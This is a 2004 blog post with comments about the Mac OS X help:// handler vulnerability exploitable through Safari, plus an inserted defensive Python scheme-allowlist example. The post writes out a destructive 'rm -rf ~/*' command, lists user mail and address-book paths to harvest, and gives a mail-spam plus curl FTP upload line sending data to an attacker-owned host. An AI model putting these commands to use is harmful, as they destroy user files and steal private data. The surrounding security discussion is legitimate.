Recognizing a warning shot
I've gotten mail about the new security exploit going around for MacOS X, either to give me a heads up on it, or to ask my thoughts on it... which is kind of odd, but cool too...
Interesting things happen when your blog goes from averaging 1k uniques/month to 130k+/month, and that's after you remove the bots and the stuff I mirror. It's gone way down from the peak, but it's still way up from what it was, with thousands of uniques pulling down my .rdf file in their newsreader of choice.
I can go through some of the others another time, but the one that's pertinent to this post is that your time to decide what to blog about gets cut way, way down, as people start telling you what they'd like you to write about. It certainly makes things simpler, but does make you feel as though you should be using a spell checker.
If you haven't followed, there's been some security buzz of late in the OSX world. Much of it has been... kinda blown off by the mainstays of the Mac community, either by saying "it's a feature, not a bug" regarding something like the DHCP vulnerability, or with conspiracy theories about whether or not a certain company actually created the vulnerability. There's also been a trojan, unrelated to any of them, floating around the file-sharing services claiming to be Office 2004...
...this particular exploit is much more general, and involves the help:// protocol built into MacOS X, which can be exploited through Safari. Basically, if you go to a site that exploits this, Safari hands the URL off to the help viewer without asking, and the help viewer will run whatever you tell it to. It's very, very reminiscent of older IE for Windows exploits.
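The check Safari was missing in the hand-off just described, as an added example that is not code from the original post: a scheme allowlist for a URL dispatcher, written in Python. The handler table and the sample links are constructed for the example (the help: target is a placeholder, not an exploit string), and the three-way policy is my own, not Apple's. It normalises the URL the way browsers do before reading the scheme (strips leading control characters and spaces, drops embedded tabs and newlines, case-folds), so a link hidden behind odd whitespace or capitalisation lands on the same verdict; web schemes the browser renders itself pass silently, a scheme with a registered external handler gets surfaced to the user before anything launches, and a scheme nobody registered is dropped.

```python
"""Scheme allowlist for a URL dispatcher (added example, not the post's code).

The weakness described above is that the browser hands any URL whose scheme it
does not render itself to whatever application the OS has registered for that
scheme, with no check in between. This module is the missing check.
"""
import re

# Schemes the browser fetches and renders itself; no external program starts.
RENDER_SCHEMES = frozenset({"http", "https", "ftp"})

# Constructed sample of scheme -> handling application, standing in for the
# OS's registration table (LaunchServices on Mac OS X). Not real data.
SAMPLE_HANDLERS = {
    "help": "Help Viewer",
    "mailto": "Mail",
    "webdav": "Finder",
}

# RFC 3986 section 3.1: scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
# Every C0 control character plus the space character.
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def extract_scheme(url):
    """Return the lowercase scheme of `url`, or None if it has none.

    Normalisation mirrors what browsers do before dispatch, so the scheme the
    policy sees is the scheme the OS would see: leading/trailing C0 controls
    and spaces are stripped, embedded tabs and newlines are removed, and the
    result is case-folded. Anything that is not a valid scheme (a relative
    path, a scheme starting with a digit) yields None.
    """
    cleaned = url.strip(_C0_AND_SPACE)
    cleaned = re.sub(r"[\t\r\n]", "", cleaned)
    match = _SCHEME_RE.match(cleaned)
    if match is None:
        return None
    return match.group(1).lower()


def decide(url, handlers=SAMPLE_HANDLERS):
    """Decide what the dispatcher may do with `url`.

    Returns a dict with:
      action  - "render": the browser handles it itself (web scheme or a
                          relative link); no external program is launched
                "prompt": an external handler is registered; name it and ask
                "block" : a scheme no application is registered for
      scheme  - the normalised scheme (None for a relative link)
      handler - the registered application, when there is one
    Default-deny is the point: a scheme the user has never heard of, whether a
    typo or one an installer quietly registered, never launches silently.
    """
    scheme = extract_scheme(url)
    if scheme is None or scheme in RENDER_SCHEMES:
        return {"action": "render", "scheme": scheme, "handler": None}
    handler = handlers.get(scheme)
    if handler is None:
        return {"action": "block", "scheme": scheme, "handler": None}
    return {"action": "prompt", "scheme": scheme, "handler": handler}


def triage_links(urls, handlers=SAMPLE_HANDLERS):
    """Run `decide` over every link on a page and return the ones that would
    reach outside the browser, i.e. everything that is not plain rendering."""
    verdicts = [(u, decide(u, handlers)) for u in urls]
    return [(u, v) for (u, v) in verdicts if v["action"] != "render"]


if __name__ == "__main__":
    # Constructed sample links; the help: target is a placeholder.
    page_links = [
        "https://example.invalid/",
        "HELP:sample-target",
        "\t help:sample-target",
        "mailto:someone@example.invalid",
        "madeup:whatever",
        "/relative/link.html",
    ]
    for url, verdict in triage_links(page_links):
        print(f"{verdict['action']:6s} {verdict['scheme']!s:8s} "
              f"{verdict['handler'] or '-':12s} {url!r}")
```

The convenience cost is the "prompt" branch: every mailto: or help: link now asks once before an application opens. That is the trade the post is arguing for, and the "block" branch is what makes a freshly invented scheme useless to an attacker instead of one more hole to patch.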
To break it down, my thoughts are six-fold:
- It's a big, big deal
Extremely serious. Most of the things out right now are simple proofs-of-concept, but don't kid yourself, this is nasty. While there have been several nasty holes found recently, the barrier to entry for creating something really nasty and hurting a grandma has dropped severely. Someone could well post a link to something malicious in the comments to this post and you'd be screwed. And it's making the rounds, big time. We aren't even talking about something complex enough to warrant needing a Mac for testing... anyone who looks at the vulnerability, checks out the test case and knows the command
rm -rf ~/*
is your worst nightmare. Part of me is glad for it: there are Apple users out there who feel immune, act as such, click everything that comes their way, and pretty much tell others to do the same. They consider it a bragging right. They've now joined the rest of the computing world in having to be careful about where they go, just not as careful.
Mac users: you're going to get freaked by this, and be tempted to write it off. Don't do that; you'll just look foolish. Don't cry Chicken Little, but this is the real deal.
- It could be worse
It's not a self-propagating worm at this point. And short of being a root-exploitable default service, it's about as bad as it could get. Right now, the ways this is being used are pretty simplistic. But don't kid yourself... with a lot more brain power applied, this could get real bad, real fast. I wouldn't be surprised if someone is writing up a curl script to push this to hundreds of forums or mailing lists.
- This is a security versus convenience thing
There's a fine line that every OS maker has to contend with. Security is a trade-off: the more secure something is, the more inconvenient it will be. There are lots of people saying "Apple had to do this, otherwise installing software would be too hard for people". There's validity to that, in that it's convenient and increases usability; I've even been grateful for it before. But there's a certain other OS vendor who has gone down this path before, and is getting harangued because of it.
- There's nothing magical about Mac OSX
Those who think Macs are magically more secure than other systems really need to take a gut-check with this. Apple is ahead of the game in that the guts they build on are open source, fairly well tested, and take security seriously from the start. But you have to remember that this is OSX's base, not the whole deal. As people start to turn a security eye to OSX they aren't finding fault with the *nix base so much as with what Apple bolts on. Anything Apple adds is fair game: far less tested, and possibly exploitable. Being based on *nix does not give it inherent security; it just raises the bar, and the bar can be lowered again by what's bolted on top of it.
- Disappointed
I'm not so much disappointed that it happened, but rather at Apple's handling of security matters yet again. The finder of the exploit claims he told Apple about it in February, and finally came forward after being ignored. Among those whose opinions I care about, Apple is gaining mindshare as a company that downplays security problems in the name of PR and is uncommunicative with security researchers. They need to change that story. In the past, the Mac crowd has gone after these guys as though they were lying about when they told Apple... lay off. I can't speak with certainty on this one, but I know it's happened in the past. There is no patch from Apple, although there are workarounds available. And Apple has just given their canned response, and people are saying "I hope they fix it soon".
- Using a low-visibility platform has its benefits
Those who think Apple's minority status doesn't save their ass need to treat this as a shot across the bow, and wake up to the fact that this is the kind of hole that, had it been on Windows, would have been the cause of tens of thousands of PCs being infected with spyware and malware.
The last seems to cause the most contention; often when someone says something like "Macs are low-visibility, which is why they don't have viruses" they get blasted by the Mac faithful like you wouldn't believe. I'm not quite sure where it comes from, but while it isn't the whole story, there's definite truth to it.
It's all about opportunity costs. Here's an example:
Some of the most prevalent malware lately has been the equivalent of an encrypted .dmg file emailed to a user, who then has to save it to disk, open it, enter a password, and double-click a wrapped shell script... and they're lunch.
In some ways doing this on something like 10.3 would be _easier_ than on current versions of Windows, as many of the viruses now carry along their own little SMTP engine because it really isn't that easy to script stuff going straight out through Outlook anymore.
I whipped up a silly proof-of-concept of this pretty easily, which I checked to make sure would work, and then deleted straight away. But to give you an idea, once you've trawled things like:
~/Library/Mail/
~/Library/Application\ Support/AddressBook
~/Documents/Microsoft\ User\ Data/Office\ X\ Identities/
...etc...
Your money shot can be as simple as something like:
mail -s "$spamsubject" "$spamlist" < $messagebodies;
curl -T $path2spamlist ftp://$remoteOwnedHost$remotePath -u $remoteOwnedUser:$remotePass
You're talking all of 10 minutes, really, to get some of the most damning functionality, even for someone of limited skillz. And I'm just talking about harvesting for spam... doing a locate for Quicken files or .doc or .xls files would be just as easy, but this was just to give you an idea.
Hell, the ease of coding on the mac would allow you to create a more feature-laden, less buggy social virus in half the time... ;)
But stop and think about it... there's no real bang for the buck in doing it for the Mac; you have a drastically smaller field of possible hosts to spread to. This includes not only Mac machines, but happening to get that one person who will download the virus and actually run it. Sure, it'll get lucky here and there, but it will quickly peter out once it gets a little way.
The same will happen to this... sure, one could throw up a Geocities page with lots of Mac-related content, let it get googled and then wait and see how many Mac users you snare... but we're talking paltry stuff. Sheer numbers mean that if you're using a 5-year-old Windows IE exploit you'll have 100 times the exploited users in 1/100th of the time.
Which isn't to downplay the danger of this current exploit in any way. If I were a real bastard, and you hadn't applied the fixes, and were reading this on a 10.3 machine, the above could be running on your machine as you read this, sending me all your private goodies.
The subject is kind of tiring at this point, and I've pretty much shot my load. Apple is crunching some spreadsheet showing them that their current status quo makes sense, and doesn't seem to realize they're missing a variable in their equation.
Comments (9)
Posted by: Jason Choa at May 21, 2004 07:56 AM
Stop scaremongering! This is not that "big, big deal", or it would be patched. Show one who has come forth saying they have lost data from this, & until they do this is all just entertaining theory.
Posted by: apex at May 21, 2004 09:30 AM
Way to go asshole, why don't you write half the virus for them. Oh wait, you DID.
Posted by: M at May 21, 2004 11:07 AM
Lighten up Apex, we're past the point where four lines of sample code matter.
Speaking of, does anyone know if the script kiddies on Windows ever realized that code could be used to name files (like virii/worms) and emails (like re your last message)?
Back on topic, I've always hated Safari (Mosaic is dead and long gone, move on) and especially 'internet enabled' dmgs. So I sort of lucked into being nearly immune to this in the first place.
Posted by: iGeek at May 21, 2004 04:01 PM
I'm growing tired of most of the "mac web". Why aren't any of the other mac sites taking Apple to task for this?
The double standards they hold Apple to are so tired. They just won't talk about stuff like this, you have to go to eweek or something not mac-related!
At least this time they don't seem to be bashing the people saying it is a problem. I stopped reading daring fireball when they said the DHCP vulnerability was not a problem and anyone who said it was clueless.
Anyways, good job again.
Posted by: iGeek at May 22, 2004 04:35 PM
Apple has released a security update yesterday (it is dated wrong?) but it doesn't really fix it.
There are at least 6 different ways for this to be exploited. ftp://, webdav:// & others. I would think with two months they would have fixed the root cause and not just a symptom.
Posted by: Timothy at May 23, 2004 04:29 PM
This is getting worse and Apple's patch only stops one. You can now just make up a handler protocol to exploit which makes it exponential, not 6.
I am using paranoid android from unsanity, but it seems like a temporary fix at best. It is scary when the rest of the community is having to release these fixes, and not Apple.
Posted by: at May 23, 2004 08:13 PM
For some of the newer 'holes' there is not a lot Apple can do to solve potential problems without seriously impacting the end user's way of working.
They will probably put more steps along the way before damage can be done but even that won't help some users who seem to think they are never going to get hit by any of these issues. Some people will double-click anything even if it came from some far off P2P IP. But as far as stuff happening without the user knowing, mechanisms can be put in place to enhance security.
The internet and all its associated protocols etc is the biggest threat to users. I'd personally go for some blanket protection scheme as well as tightening up what can happen without a user knowing.
Stuff like making file deletion undoable (Deep Freeze-like qualities). Creating a 'safe' browsing environment for users. 'Safe' in the sense that whatever happens during an internet session is summarised and reported to the user before becoming final. Basically the same kind of functionality/security that a new non-admin user would afford your average web surfer but without the need to create the user, or maintaining separate file destinations etc and done with Apple ease of use in mind. A simple on/off button and plain English descriptions.
etc, etc. I don't have time to expand on these suggestions right now.
Posted by: drunkenbatman at May 24, 2004 02:56 PM
Anon guy said >> For some of the newer 'holes' there is not a lot Apple can do to solve potential problems without seriously impacting the end user's way of working.
You raise a good point, except that I'd take a different tack than you by saying if that's how it is, the user shouldn't be working that way. Yes it's convenient, but we've been down the convenience over security route before with ActiveX and Microsoft.
I'd much rather remove the functionality and have to work in a different way, rather than wait while Apple plays whack-a-mole for the next 5 years due to the problems.
I am sure Apple will have a patch for this soon, Apple has a good record as a whole for patching. I do wonder what the holdup on the patch is, maybe they are waiting to include it in 10.3.4?
To patch my macs I am using DGTGF. It seems to work; none of my macs show up as vulnerable now.